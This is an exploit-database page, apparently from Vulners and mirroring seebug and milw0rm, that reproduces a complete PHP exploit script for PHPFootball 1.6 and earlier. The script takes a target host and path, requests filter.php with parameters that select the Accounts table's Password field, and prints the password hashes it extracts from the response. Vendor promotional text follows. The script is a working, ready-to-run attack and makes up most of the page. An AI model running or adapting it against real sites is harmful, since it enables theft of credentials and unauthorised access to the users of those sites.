Lucene search
K

PHPFootball <= 1.6 (filter.php) Remote Hash Disclosure Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 23 Views

PHPFootball <= 1.6 Remote Hash Disclosure Exploi

Code

                                                &#60;?php

// http://garr.dl.sourceforge.net/sourceforge/phpfootball/PHPfootball1.6.zip

$host = $argv[1];
$path = $argv[2];

if ($argc != 3) {
    
    echo &#34;PHPFootball &#60;= 1.6 (filter.php) Remote Hash Disclosure Exploit\n&#34;;
    echo &#34;by KinG-LioN - http://eurohackers.it\n&#34;;
    echo &#34;Usage: php {$argv[0]} &#60;host&#62; &#60;path&#62;\n&#34;;
    exit;
}
else {

   $head .= &#34;GET /{$path}/filter.php?dbtable=Accounts&dbfield=Password HTTP/1.1\r\n&#34;;
   $head .= &#34;Host: {$host}\r\n&#34;;
   $head .= &#34;Connection: close\r\n\r\n&#34;;
   
   $fsock = fsockopen ($host,80);
   fputs ($fsock,$head);
   
   while (!feof($fsock)) {
     $cont .= fgets($fsock);
   } 
    fclose($fsock); 
    
    if (preg_match_all(&#34;/&#60;td class=td&#62;(.+?)&#60;\/td&#62;/&#34;,$cont,$i)) {
        print_r($i[1]);
   } 
   else {
       die (&#34;exploit error\n&#34;);
   }
}


?&#62;

# milw0rm.com [2009-01-01]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
23